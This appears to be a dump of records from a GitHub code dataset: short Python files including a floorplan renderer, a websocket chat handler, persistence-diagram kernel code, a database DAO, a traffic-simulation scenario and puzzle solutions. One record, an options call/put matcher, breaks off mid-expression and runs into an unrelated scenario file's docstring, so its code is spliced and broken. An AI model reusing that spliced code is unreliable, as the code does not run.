drawFullRoom(rooms)\n\n\ndef drawFullRoom(rooms):\n maxX = -1\n maxXwidth = -1\n maxY = -1\n maxYheight = -1\n for room in rooms:\n if room.anchor[0] >= maxX:\n maxX = room.anchor[0]\n if room.width >= maxXwidth:\n maxXwidth = room.width\n if room.anchor[1] >= maxY:\n maxY = room.anchor[1]\n if room.height >= maxYheight:\n maxYheight = room.height\n\n image = Image.new(\n mode=\"RGB\",\n size=(\n (maxX + maxXwidth) * Const.ROOM_SIZE * Const.CELL_SIZE,\n (maxY + maxYheight) * Const.ROOM_SIZE * Const.CELL_SIZE,\n ),\n color=Const.WHITE,\n )\n for room in rooms:\n image.paste(\n Image.open(str(room.uid) + \".png\", \"r\"),\n (\n room.anchor[0] * Const.ROOM_SIZE * Const.CELL_SIZE,\n room.anchor[1] * Const.ROOM_SIZE * Const.CELL_SIZE,\n ),\n )\n draw = ImageDraw.Draw(image)\n for room in rooms:\n width = room.width * Const.ROOM_SIZE * Const.CELL_SIZE\n height = room.height * Const.ROOM_SIZE * Const.CELL_SIZE\n x = room.anchor[0] * Const.ROOM_SIZE * Const.CELL_SIZE\n y = room.anchor[1] * Const.ROOM_SIZE * Const.CELL_SIZE\n for door in room.doors:\n o = door.on\n a = door.at\n if door.on == \"left\":\n draw.line(\n (\n (x, (a - 1) * Const.CELL_SIZE),\n (x, (a + 1) * Const.CELL_SIZE),\n ),\n fill=Const.GRAY_LIGHT,\n width=6,\n )\n elif 
door.on == \"right\":\n draw.line(\n (\n (width + x, (a - 1) * Const.CELL_SIZE),\n (width + x, (a + 1) * Const.CELL_SIZE),\n ),\n fill=Const.GRAY_LIGHT,\n width=6,\n )\n elif door.on == \"top\":\n draw.line(\n (\n ((a - 1) * Const.CELL_SIZE, y),\n ((a + 1) * Const.CELL_SIZE, y),\n ),\n fill=Const.GRAY_LIGHT,\n width=6,\n )\n elif door.on == \"bottom\":\n draw.line(\n (\n ((a - 1) * Const.CELL_SIZE, height + y),\n ((a + 1) * Const.CELL_SIZE, height + y),\n ),\n fill=Const.GRAY_LIGHT,\n width=6,\n )\n image.save(\"full.png\")\n\n\ndef drawRoom(room):\n # inverted because of PIL's coordinate system\n height = room.width * Const.ROOM_SIZE * Const.CELL_SIZE\n width = room.height * Const.ROOM_SIZE * Const.CELL_SIZE\n\n step_count = height / Const.CELL_SIZE\n image = Image.new(mode=\"RGB\", size=(height, width), color=Const.WHITE)\n draw = ImageDraw.Draw(image)\n y_start = 0\n y_end = image.height\n step_size = int(image.width / step_count)\n for x in range(0, image.width, step_size):\n line = ((x, y_start), (x, y_end))\n draw.line(line, fill=Const.GRAY_LIGHT)\n x_start = 0\n x_end = image.width\n for y in range(0, image.height, step_size):\n line = ((x_start, y), (x_end, y))\n draw.line(line, fill=Const.GRAY_LIGHT)\n draw.line(((0, 0), (height, 0)), fill=0, width=3)\n draw.line(((0, 0), (0, width)), fill=0, width=3)\n draw.line(((height, width), (height, 0)), fill=0, width=3)\n draw.line(((height, width), (0, width)), fill=0, width=3)\n\n for box in room.boxes:\n a = box.anchor\n draw.rectangle(\n (\n a[0] * Const.CELL_SIZE,\n a[1] * Const.CELL_SIZE,\n a[0] * Const.CELL_SIZE + Const.CELL_SIZE,\n a[1] * Const.CELL_SIZE + Const.CELL_SIZE,\n ),\n fill=tuple(box.color),\n outline=(0),\n )\n draw.text(\n (a[0] * Const.CELL_SIZE + 4, a[1] * Const.CELL_SIZE + 12),\n box.name,\n Const.WHITE,\n )\n for cable in room.cables:\n s = cable.start\n e = cable.end\n if cable.is_vertical:\n for i in range(1, cable.size + 1):\n draw.line(\n (\n (s[0] * Const.CELL_SIZE + 4 * i, s[1] * Const.CELL_SIZE + 4),\n (e[0] * Const.CELL_SIZE + 4 * i, e[1] * Const.CELL_SIZE + 4),\n ),\n fill=Const.RED_NORMAL if i == 1 else Const.RED_DARK,\n width=1,\n )\n else:\n for i in range(1, cable.size + 1):\n draw.line(\n (\n (s[0] * Const.CELL_SIZE + 4, s[1] * Const.CELL_SIZE + 4 * i),\n (e[0] * Const.CELL_SIZE + 4, e[1] * Const.CELL_SIZE + 4 * i),\n ),\n fill=Const.RED_NORMAL if i == 1 else Const.RED_DARK,\n width=1,\n )\n for door in room.doors:\n o = door.on\n a = door.at\n if door.on == \"left\":\n draw.line(\n (\n (0, (a - 1) * Const.CELL_SIZE),\n (0, (a + 1) * Const.CELL_SIZE),\n ),\n fill=Const.GRAY_LIGHT,\n width=5,\n )\n elif door.on == \"right\":\n draw.line(\n (\n (width, (a - 1) * Const.CELL_SIZE),\n (width, (a + 1) * Const.CELL_SIZE),\n ),\n fill=Const.GRAY_LIGHT,\n width=5,\n )\n elif door.on == \"top\":\n draw.line(\n (\n ((a - 1) * Const.CELL_SIZE, 0),\n ((a + 1) * Const.CELL_SIZE, 0),\n ),\n fill=Const.GRAY_LIGHT,\n width=5,\n )\n elif door.on == \"bottom\":\n draw.line(\n (\n ((a - 1) * Const.CELL_SIZE, height),\n ((a + 1) * Const.CELL_SIZE, height),\n ),\n fill=Const.GRAY_LIGHT,\n width=5,\n )\n\n image.save(str(room.uid) + \".png\")\n\n\ndef main():\n assert len(sys.argv) == 2, \"Invalid arguments length\"\n global variables\n\n src = parseMacros(sys.argv[1])\n\n # Handle nested loops\n tmp_src = []\n while True:\n tmp_src = parseLoops(src)\n if tmp_src != src:\n src = tmp_src\n continue\n break\n\n # Handle nested ifs\n tmp_src = []\n while True:\n tmp_src = parseConditionals(src)\n if tmp_src != src:\n src = 
tmp_src\n continue\n break\n\n srcf = \"precompiled.src.floor\"\n with open(srcf, \"w\") as f:\n f.writelines(src)\n\n # Vars and Consts can be parsed only after the src is flattened\n variables = parseVariables(srcf)\n parseMath(srcf)\n\n rooms = parseRooms(srcf)\n drawRooms(rooms)\n\n\nif __name__ == \"__main__\":\n variables = []\n main()\n","repo_name":"ZenT3600/floorplanner","sub_path":"floorplanner.py","file_name":"floorplanner.py","file_ext":"py","file_size_in_byte":24311,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"14821049259","text":"from src.db import table\nfrom src.utils import Utils\n\n\nclass Routes:\n utils = Utils()\n\n def connect(self, id):\n data = {}\n data[\"connectionId\"] = id\n\n table.put_item(Item=data)\n\n return f\"{id} connected\"\n\n def disconnect(self, id):\n table.delete_item(Key={\"connectionId\": id})\n\n return f\"{id} has disconnected\"\n\n def setName(self, body, id):\n name = body.get(\"name\")\n\n validation = self.utils.validate(\n id,\n [\n {\n \"name\": \"Name\",\n \"value\": name,\n }\n ],\n )\n\n if validation != True:\n return validation\n else:\n users = table.scan()\n\n for user in users[\"Items\"]:\n if name == user.get(\"name\"):\n self.utils.response(id, \"The name is already in use\")\n return \"The name is already in use\"\n\n table.update_item(\n Key={\"connectionId\": id},\n UpdateExpression=\"SET #name=:n\",\n ExpressionAttributeNames={\"#name\": \"name\"},\n ExpressionAttributeValues={\":n\": name},\n )\n\n self.utils.response(id, \"Name setted\")\n\n return True\n\n def sendTo(self, body, id):\n if self.utils.checkName(id):\n to_id = body.get(\"to_id\")\n msg = body.get(\"message\")\n\n validation = self.utils.validate(\n id,\n [\n {\n \"name\": \"To_id\",\n \"value\": to_id,\n },\n {\n \"name\": \"Message\",\n \"value\": msg,\n },\n ],\n )\n\n if validation != True:\n return validation\n else:\n self.utils.response(to_id, msg, id)\n\n return True\n else:\n return \"Name not defined\"\n\n def sendToAll(self, body, id):\n if self.utils.checkName(id):\n msg = body.get(\"message\")\n\n validation = self.utils.validate(\n id,\n [\n {\n \"name\": \"Message\",\n \"value\": msg,\n }\n ],\n )\n\n if validation != True:\n return validation\n else:\n id_list = []\n\n users = table.scan()\n for user in users[\"Items\"]:\n cid = user[\"connectionId\"]\n id_list.append(cid) if cid not in id_list else id_list\n\n self.utils.response(id_list, msg, id)\n\n return True\n else:\n return \"Name not defined\"\n\n def default(self, id):\n self.utils.response(id, \"Action not allowed\")\n\n return \"Action not allowed\"\n","repo_name":"Zapodask/lambda-websockets-chat","sub_path":"src/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"28999683994","text":"voltas = 0\nmaiores = 0\nhomens = 0\nfemsub20 = 0\nflag = 'S'\n\nwhile True:\n voltas += 1\n sexo = str(input(f'Sexo {voltas}: ')).strip().upper()[0]\n idade = int(input(f'Idade {voltas}: '))\n\n if idade > 18:\n maiores += 1\n elif sexo == 'M':\n homens += 1\n elif sexo == 'F' and idade < 20:\n femsub20 += 1\n \n flag = str(input('Deseja continuar? ')).strip().upper()[0]\n if flag == 'N':\n break\n\nprint(f'''Seu programa achou os seguintes resultados:\n{maiores} pessoas com mais de 18 anos;\n{homens} pessoas do sexo masculino;\n{femsub20} mulheres abaixo dos 20 anos.\n''')","repo_name":"TT-Bone/guanabara-python","sub_path":"Exercícios/069.py","file_name":"069.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4618793674","text":"#odd 2k+1\r\nwhile True:\r\n a = raw_input(\"Inserte primer numero: \")\r\n b = raw_input(\"Inserte segundo numero: \")\r\n if a.isdigit() and b.isdigit():\r\n if int(a) < int(b):\r\n i = int(a)\r\n ans = 0\r\n while i <= int(b):\r\n if i % 2 == 0:\r\n i += 1\r\n else:\r\n ans += i\r\n i += 1\r\n print (ans)\r\n\r\n else:\r\n print(\"El primer numero NO debe ser mayor al segundo\")\r\n else:\r\n print (\"Invalido: Solo numeros.\")\r\n","repo_name":"MedMachine/Python_Basics","sub_path":"Conditions_and_loops.py","file_name":"Conditions_and_loops.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"27645344318","text":"\"\"\"\nfunctions related to kernels of persistence diagram\n\"\"\"\n\nimport sys\nimport numpy as np\nimport time\nimport sklearn_tda as tda\nfrom joblib import Parallel, delayed\n\nfrom Esme.dgms.test import generate_swdgm\nfrom Esme.helper.format import precision_format\nfrom Esme.helper.time import timefunction\nfrom Esme.helper.others import assert_names\n\ndef sw(dgms1, dgms2, kernel_type='sw', parallel_flag=False, **featkwargs):\n \"\"\"\n :param dgms1: numpy array\n :param dgms2: numpy array\n :param parallel_flag:\n :param kernel_type:\n :param featkwargs: when kernel_type is sw, kwargs has n_d, bw\n when kernel_type is pss, kwargs has bw\n when kernel_type is wg, kwargs has bw, K,p\n :return: a computed kernel\n \"\"\"\n def arctan(C, p):\n return lambda x: C * np.arctan(np.power(x[1], p))\n import signal\n\n def signal_handler(signum, frame):\n raise Exception(\"Timed out!\")\n\n signal.signal(signal.SIGALRM, signal_handler)\n time_limit = max(int(len(dgms1)*len(dgms2)* 0.2),100)\n signal.alarm(time_limit)\n\n if parallel_flag==False:\n if kernel_type=='sw':\n assert_names(['n_directions', 'bw'], featkwargs)\n tda_kernel = tda.SlicedWassersteinKernel(num_directions=featkwargs['n_directions'], bandwidth=featkwargs['bw'])\n elif kernel_type=='pss':\n assert_names(['bw'], featkwargs)\n tda_kernel = tda.PersistenceScaleSpaceKernel(bandwidth=featkwargs['bw'])\n elif kernel_type == 'wg':\n assert_names(['bw', 'K', 'p'], featkwargs)\n tda_kernel = tda.PersistenceWeightedGaussianKernel(bandwidth=featkwargs['bw'], weight=arctan(featkwargs['K'], featkwargs['p']))\n elif kernel_type == 'pf':\n assert_names(['bw', 'bwf'], featkwargs)\n # try:\n tda_kernel = tda.PersistenceFisherKernel(bandwidth_fisher=featkwargs['bwf'], bandwidth=featkwargs['bw'])\n # except RuntimeWarning:\n # tda_kernel = 0\n # print('RuntimeWarning catched')\n # print(f'dgm1', dgms1)\n # print(f'dgm2', dgms2)\n else:\n print ('Unknown kernel for function sw')\n\n diags1 = dgms1; diags2 = dgms2\n X = tda_kernel.fit(diags1)\n Y = tda_kernel.transform(diags2)\n Y = np.nan_to_num(Y) # todo wait for mathieu's reply\n return Y\n\n\n@timefunction\ndef sw_parallel(dgms1, dgms2, kernel_type='sw', parallel_flag=True, granularity=25, **featkwargs):\n \"\"\"\n build on top of function sw\n\n :param dgms1: a list of array.\n :param dgms2:\n :param kernel_type: sw, pss, wg\n :param parallel_flag: Ture if want to compute in parallel\n :param granularity: parameter for parallel computing.\n :param featkwargs: kwargs for sw/pss/wg\n :return:\n \"\"\"\n\n t1 = time.time()\n assert_sw_dgm(dgms1)\n assert_sw_dgm(dgms2)\n n1 = len(dgms1); n2 = len(dgms2)\n kernel = np.zeros((n2, n1))\n\n if parallel_flag:\n # parallel version\n kernel = Parallel(n_jobs=-1, backend='multiprocessing')(delayed(sw)(dgms1, dgms2[i:min(i+granularity, n2)], kernel_type=kernel_type,\n **featkwargs) for i in range(0, n2, granularity))\n kernel = (np.vstack(kernel))\n else: # used as verification\n for i in range(n2):\n kernel[i] = sw(dgms1, [dgms2[i]], kernel_type=kernel_type, **featkwargs)\n\n t = precision_format(time.time()-t1, 1)\n print('Finish computing %s kernel of shape %s. 
Takes %s'%(kernel_type, kernel.shape, t))\n return (kernel/float(np.max(kernel)), t)\n\ndef sw_parallel_test():\n dgms1 = generate_swdgm(1000)\n dummy_kwargs = {'K':1, 'p':1}\n serial_kernel = sw_parallel(dgms1, dgms1, bw=1, parallel_flag=False, **dummy_kwargs)[0]\n parallel_kernel = sw_parallel(dgms1, dgms1, bw=1, parallel_flag=True, **dummy_kwargs)[0]\n diff = serial_kernel - parallel_kernel\n assert np.max(diff) < 1e-5\n\ndef assert_sw_dgm(dgms):\n # check sw_dgm is a list array\n # assert_sw_dgm(generate_swdgm(10))\n assert type(dgms)==list\n for dgm in dgms:\n try:\n if len(dgm) > 0:\n assert np.shape(dgm)[1]==2\n else:\n print('There exist empty dgm in dgms')\n except AssertionError:\n print('Not the right format for sw. Should be a list of array')\n\ndef random_dgms(n=10):\n dgm_list = []\n for i in range(n):\n dgm = np.random.random((10,2))\n dgm_list.append(dgm)\n return dgm_list\n\n\nif __name__ == '__main__':\n dgms1 = generate_swdgm(100)\n # dummy_kwargs = {'n_directions':10, 'bw':1}\n dummy_kwargs = {'bwf':1, 'bw':1}\n print('serial kernel\\n' + '-'*50)\n serial_kernel = sw_parallel(dgms1, dgms1, kernel_type='pf', parallel_flag=False, **dummy_kwargs)[0]\n print('parallel kernel\\n' + '-'*50)\n parallel_kernel = sw_parallel(dgms1, dgms1, kernel_type='pf', parallel_flag=True, **dummy_kwargs)[0]\n print(serial_kernel, parallel_kernel)\n diff = serial_kernel - parallel_kernel\n print(f'max diff is {np.max(diff)}' )\n assert np.max(diff) < 1e-5\n sys.exit()\n\n dgms1 = random_dgms(300)\n kwargs = {'n_directions':10, 'bandwidth':1.0, 'K':1, 'p':1}\n print(sw_parallel(dgms1, dgms1, parallel_flag=False, kernel_type='sw', **kwargs))\n","repo_name":"Chen-Cai-OSU/Esme","sub_path":"Esme/dgms/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"11475377899","text":"#!/usr/bin/env python\n\"\"\"drawing_comp_short.py: Draw a complete graph.\n\"\"\"\nimport colorsys\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nplt.axes().set_aspect('equal', 'datalim')\n\nnum_nodes = 17\nG = nx.complete_graph(num_nodes)\npos = nx.circular_layout(G)\nncolors = [colorsys.hsv_to_rgb(h / num_nodes, 1.0, 1.0)\n for h in range(num_nodes)]\nnx.draw_networkx(G, pos, node_color=ncolors)\nplt.show()\n","repo_name":"showa-yojyo/notebook","sub_path":"doc/source/_sample/networkx/drawing_comp_short.py","file_name":"drawing_comp_short.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"71"}
+{"seq_id":"2024681506","text":"from time import time\n\nfrom aspects import Aspect\nfrom program import Program\nfrom typing import Iterable, List, Optional\n\nfrom results import Results, Result\n\n\nclass Runner:\n def __init__(self,\n programs: Iterable[Program],\n aspects: Optional[Iterable[Aspect]]=None):\n self.aspects: List[Aspect] = list(aspects or ())\n self.programs: List[Program] = list(programs)\n\n def run(self) -> Results:\n results = Results()\n\n for program in self.programs:\n results.add_result(self.test_program(program))\n\n return results\n\n def test_program(self, program: Program) -> Result:\n for aspect in self.aspects:\n aspect.prepare(program)\n\n before = time()\n return_value = program.execute()\n after = time()\n\n result = Result(program, return_value, after - before)\n\n for aspect in self.aspects:\n aspect.examine(result)\n\n return result\n","repo_name":"lucasmoeskops/test-runner","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"27001129811","text":"import sys; sys.stdin = open('input_data/2817.txt',\"r\")\n\ndef BBJH(idx, total):\n global count\n if idx == length:\n if total == want:\n count += 1\n return\n if total > want:\n return\n BBJH(idx+1, total + numbers[idx])\n BBJH(idx+1, total)\n\nfor t in range(1,int(input())+1):\n length, want = list(map(int, input().split()))\n numbers = list(map(int, input().split()))\n count = 0\n BBJH(0, 0)\n print('#{} {}'.format(t, count))\n\n\n","repo_name":"AshOil/APS","sub_path":"SWEA/D3/2817_부분 수열의 합.py","file_name":"2817_부분 수열의 합.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72290322466","text":"import psycopg2\nfrom dao.base_dao import BaseDAO\nfrom dao.model.incoming_image import incoming_image\n\nclass IncomingImageDAO(BaseDAO):\n \"\"\"\n Handles interaction with raw images captured by the plane. Ros_ingest interacts\n with this DAO directly. On the REST side, most of its functionality is accessed through\n the /image/raw endpoint and the raw_image_handler module\n \"\"\"\n\n def __init__(self, configFilePath):\n super(IncomingImageDAO, self).__init__(configFilePath)\n \n def addImage(self, incomingImage):\n \"\"\"\n Adds the specified image to the incoming_image table\n @type incomingImage: incoming_image\n @param incomingImage: The image to add to the database\n\n @rtype: int\n @return: Id of image if successfully inserted, otherwise -1\n \"\"\"\n if incomingImage is None:\n return -1\n\n insertStmt = \"\"\"INSERT INTO incoming_image \n (time_stamp, focal_length, image_path, manual_tap, autonomous_tap) \n VALUES(to_timestamp(%s) AT TIME ZONE 'UTC', %s, %s, %s, %s) \n RETURNING image_id;\"\"\"\n return super(IncomingImageDAO, self).getResultingId(insertStmt, incomingImage.insertValues())\n\n def getImage(self, id):\n \"\"\"\n Attempts to get the image with the specified id\n\n @type id: int\n @param id: The id of the image to try and retrieve\n\n @rtype: incoming_image\n @return: An incoming_image with the info for that image if successfully found, otherwise None\n \"\"\"\n selectImgById = \"\"\"SELECT image_id, date_part('epoch', time_stamp), focal_length, image_path, manual_tap, autonomous_tap \n FROM incoming_image \n WHERE image_id = %s \n LIMIT 1;\"\"\"\n selectedImage = super(IncomingImageDAO, self).basicTopSelect(selectImgById, (id,))\n \n if selectedImage is None:\n return None\n return incoming_image(selectedImage)\n\n def getNextImage(self, manual):\n \"\"\"\n Attempts to get the next raw image not handled by the specified mode (manual or autonomous)\n\n @type manual: boolean\n @param manual: Whether to try and get the next image in manual's queue (True) or the autonomous queue (False)\n\n @rtype: incoming_image\n @return: An incoming_image with the info for that image if successfully found, otherwise None\n \"\"\"\n\n # step 1: claim an image if possible:\n updateStmt = None\n if manual:\n updateStmt = \"\"\"UPDATE incoming_image \n SET manual_tap = TRUE \n WHERE image_id = (\n SELECT image_id \n FROM incoming_image \n WHERE manual_tap = FALSE \n ORDER BY image_id LIMIT 1\n ) RETURNING image_id;\"\"\"\n else:\n updateStmt = \"\"\"UPDATE incoming_image \n SET autonomous_tap = TRUE \n WHERE image_id = (\n SELECT image_id \n FROM incoming_image \n WHERE autonomous_tap = FALSE \n ORDER BY image_id LIMIT 1\n ) RETURNING image_id;\"\"\"\n\n cur = self.conn.cursor()\n cur.execute(updateStmt)\n\n row = cur.fetchone()\n if row is not None:\n # step 2: get the claimed image\n claimedId = row[0]\n cur.close()\n return self.getImage(claimedId)\n\n cur.close()\n # return none if we failed to claim an image\n return None\n\n def getAll(self):\n \"\"\"\n Get info on all images currently in the table. 
Currently just used\n for testing\n \"\"\"\n selectAllSql = \"\"\"SELECT image_id, date_part('epoch', time_stamp), focal_length, image_path, manual_tap, autonomous_tap \n FROM incoming_image;\"\"\"\n\n cur = self.conn.cursor()\n cur.execute(selectAllSql)\n results = []\n for row in cur:\n incomingImg = incoming_image(row)\n results.append(incomingImg)\n\n return results","repo_name":"BYU-AUVSI/imaging","sub_path":"server/src/dao/incoming_image_dao.py","file_name":"incoming_image_dao.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
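In the record above, `getNextImage` claims work with a single `UPDATE ... RETURNING`: the subquery picks the lowest-id row not yet tapped, the update flags it, and `RETURNING` hands the id back in the same round trip. A compressed sketch of that flow for the manual queue (psycopg2-style; the `conn` object here is a hypothetical open connection):

```python
# Mirrors the claim-then-fetch flow of IncomingImageDAO.getNextImage(manual=True).
CLAIM_SQL = """UPDATE incoming_image
               SET manual_tap = TRUE
               WHERE image_id = (
                   SELECT image_id FROM incoming_image
                   WHERE manual_tap = FALSE
                   ORDER BY image_id LIMIT 1
               ) RETURNING image_id;"""

def claim_next_manual(conn):
    cur = conn.cursor()
    cur.execute(CLAIM_SQL)
    row = cur.fetchone()  # None when the queue is empty
    cur.close()
    return row[0] if row else None
```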
+{"seq_id":"14817326189","text":"# https://www.geeksforgeeks.org/get-post-requests-using-python/\n# importing the requests library \nimport requests \nimport datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nsymbols=[\"QQQ\",\"AAPL\",\"JMIA\",\"NIO\",\"PTON\",\"OPEN\",\"TSLA\",\"U\",\"MRNA\"]\nsymbols=[\"ACB\",\"FUBO\",\"JMIA\",\"QS\",\"NIO\",\"ARRY\",\"OPEN\",\"MRNA\"]\ndef match_call_put(calls,puts,use_ask=True):\n n_calls = len(calls)\n n_puts = len(puts)\n out_calls=[]\n out_puts=[]\n out_calls_iv=[]\n out_puts_iv=[]\n out_strike=[]\n last = 0\n for i in range(n_calls):\n strike_call = calls[i]['strike']\n for j in range(n_puts-last):\n j=j+last\n strike_put = puts[j]['strike']\n if strike_call == strike_put:\n out_strike.append(strike_call)\n try:\n if use_ask:#((calls[i]['ask']+calls[i]['bid'])/2.>> from flow.core.params import NetParams\n >>> from flow.core.params import VehicleParams\n >>> from flow.core.params import InitialConfig\n >>> from flow.scenarios import BottleneckScenario\n >>>\n >>> scenario = BottleneckScenario(\n >>> name='bottleneck',\n >>> vehicles=VehicleParams(),\n >>> net_params=NetParams(\n >>> additional_params={\n >>> 'scaling': 1,\n >>> 'speed_limit': 1,\n >>> },\n >>> no_internal_links=False # we want junctions\n >>> )\n >>> )\n \"\"\"\n\n def __init__(self,\n name,\n vehicles,\n net_params,\n initial_config=InitialConfig(),\n traffic_lights=TrafficLightParams()):\n \"\"\"Instantiate the scenario class.\"\"\"\n for p in ADDITIONAL_NET_PARAMS.keys():\n if p not in net_params.additional_params:\n raise KeyError('Network parameter \"{}\" not supplied'.format(p))\n\n super().__init__(name, vehicles, net_params, initial_config,\n traffic_lights)\n\n def specify_nodes(self, net_params):\n \"\"\"See parent class.\"\"\"\n nodes = [\n {\n \"id\": \"1\",\n \"x\": 0,\n \"y\": 0\n }, # pre-toll\n {\n \"id\": \"2\",\n \"x\": 100,\n \"y\": 0\n }, # toll\n\n ] # post-merge2\n return nodes\n\n def specify_edges(self, net_params):\n \"\"\"See parent class.\"\"\"\n scaling = net_params.additional_params.get(\"scaling\", 1)\n speed = net_params.additional_params['speed_limit']\n assert (isinstance(scaling, int)), \"Scaling must be an int\"\n\n edges = [\n {\n \"id\": \"1\",\n \"from\": \"1\",\n \"to\": \"2\",\n \"length\": 100,\n \"spreadType\": \"center\",\n \"numLanes\": 2 * scaling,\n \"speed\": speed\n },\n ]\n\n return edges\n\n def specify_connections(self, net_params):\n \"\"\"See parent class.\"\"\"\n conn_dic = {}\n conn = []\n for i in range(2):\n conn += [{\n \"from\": \"1\",\n \"to\": \"2\",\n \"fromLane\": i,\n \"toLane\": int(np.floor(i / 2))\n }]\n conn_dic[\"2\"] = conn\n return conn_dic\n\n def specify_routes(self, net_params):\n \"\"\"See parent class.\"\"\"\n rts = {\n \"1\": [\"1\", \"2\"],\n \"2\": [\"2\"],\n }\n\n return rts\n\n def specify_edge_starts(self):\n \"\"\"See parent class.\"\"\"\n return [(\"1\", 0), (\"2\", 100)]\n","repo_name":"eugenevinitsky/decentralized_bottlenecks","sub_path":"flow/scenarios/simple_bottleneck.py","file_name":"simple_bottleneck.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"70"}
+{"seq_id":"31490852718","text":"\"\"\"\nA crack team of love scientists from OkEros (a hot new dating site) have\ndevised a way to represent dating profiles as rectangles on a two-dimensional\nplane.\nThey need help writing an algorithm to find the intersection of two users'\nlove rectangles. They suspect finding that intersection is the key to a\nmatching algorithm so powerful it will cause an immediate acquisition by\nGoogle or Facebook or Obama or something.\n\nWrite a function to find the rectangular intersection of two given\nlove rectangles.\n\n\"\"\"\n\n\ndef get_intersection(dict1, dict2):\n \"\"\"\n Find the rectangular intersection of two given rectangles.\n\n >>> rectangle1 = {\n ... 'left_x': 1,\n ... 'bottom_y': 1,\n ... # width and height\n ... 'width': 6,\n ... 'height': 3,\n ... }\n >>> rectangle2 = {\n ... # coordinates of bottom-left corner\n ... 'left_x': 5,\n ... 'bottom_y': 2,\n ... # width and height\n ... 'width': 3,\n ... 'height': 6,\n ... }\n >>> get_intersection(rectangle1, rectangle2)\n {'left_x': 5, 'bottom_y': 2, 'width': 2, 'height': 2}\n >>> rectangle1 = {\n ... 'left_x': 1,\n ... 'bottom_y': 1,\n ... # width and height\n ... 'width': 2,\n ... 'height': 2,\n ... }\n >>> rectangle2 = {\n ... # coordinates of bottom-left corner\n ... 'left_x': 5,\n ... 'bottom_y': 3,\n ... # width and height\n ... 'width': 3,\n ... 'height': 6,\n ... }\n >>> get_intersection(rectangle1, rectangle2)\n {'left_x': None, 'bottom_y': None, 'width': None, 'height': None}\n\n \"\"\"\n love_rectangle = {\n 'left_x': None,\n 'bottom_y': None,\n 'width': None,\n 'height': None\n }\n love_rectangle['left_x'], love_rectangle['width'] = find_overlap(\n dict1['left_x'], dict1['width'], dict2['left_x'], dict2['width'])\n\n love_rectangle['bottom_y'], love_rectangle['height'] = find_overlap(\n dict1['bottom_y'], dict1['height'], dict2['bottom_y'], dict2['height'])\n\n return love_rectangle\n\n\ndef find_overlap(start1, length1, start2, length2):\n \"\"\"Find overlapping range between rectangle1 and rectangle2.\n\n >>> find_overlap(5,3,1,6)\n (5, 2)\n >>> find_overlap(5,3,1,2)\n (None, None)\n \"\"\"\n bottom_right1 = start1 + length1\n bottom_right2 = start2 + length2\n # find lowest (\"leftmost\") range end:\n highest_bottom_left = max(start1, start2)\n # find highest (\"rightmost\") range start:\n lowest_bottom_right = min(bottom_right1, bottom_right2)\n # edge case: no intersection\n if lowest_bottom_right <= highest_bottom_left:\n return (None, None)\n overlap_width = lowest_bottom_right - highest_bottom_left\n\n return (highest_bottom_left, overlap_width) # return start point, lenght\n","repo_name":"mbichoffe/coding_challenges","sub_path":"find_rectangles_intersection.py","file_name":"find_rectangles_intersection.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22863116267","text":"import easygui\nimport time\nimport math\n\n\nAOCDAY = \"24\"\n\ndef readFile(fileName):\n # Reads the file at fileName and returns a list of lines stripped of newlines\n with open(fileName, \"r\") as file:\n lines = file.readlines()\n for i in range(len(lines)):\n lines[i] = lines[i].rstrip()\n return lines\n\ndef bioDiversity(generation):\n value = 1\n score = 0\n for y in range(len(generation)):\n for x in range(len(generation[0])):\n if generation[y][x] == \"#\":\n score += value\n value *= 2\n return score\n\ndef nextGeneration(generation):\n next = []\n for y in range(len(generation)):\n newLine = []\n for x in range(len(generation[0])):\n neighbours = 0\n if y > 0 and generation[y-1][x] == \"#\":\n neighbours += 1\n if y < len(generation) - 1 and generation[y+1][x] == \"#\":\n neighbours += 1\n if x > 0 and generation[y][x-1] == \"#\":\n neighbours += 1\n if x < len(generation[0]) - 1 and generation[y][x+1] == \"#\":\n neighbours += 1\n if generation[y][x] == \"#\":\n if neighbours == 1:\n newLine.append(\"#\")\n else:\n newLine.append(\".\")\n else:\n if neighbours == 1 or neighbours == 2:\n newLine.append(\"#\")\n else:\n newLine.append(\".\")\n next.append(newLine)\n return next\n\ndef part1(lines):\n # Code the solution to part 1 here, returning the answer as a string\n eris = []\n for line in lines:\n newLine = []\n for spot in line:\n newLine.append(spot)\n eris.append(newLine)\n seen = [bioDiversity(eris)]\n while True:\n eris = nextGeneration(eris)\n score = bioDiversity(eris)\n if score in seen:\n # # Uncomment next 3 lines to print out last generation.\n # print(\"-----\")\n # for line in eris:\n # print(\"\".join(line))\n return score\n else:\n seen.append(score)\n # # Uncomment next 3 lines to print out generations.\n # print(\"-----\")\n # for line in eris:\n # print(\"\".join(line))\n \ndef outerCount(generation2D):\n top_count = 0\n bottom_count = 0\n right_count = 0\n left_count = 0\n for i in range(5):\n if generation2D [0][i] == '#':\n top_count += 1\n if generation2D [-1][i] == '#':\n bottom_count += 1\n if generation2D [i][0] == '#':\n left_count += 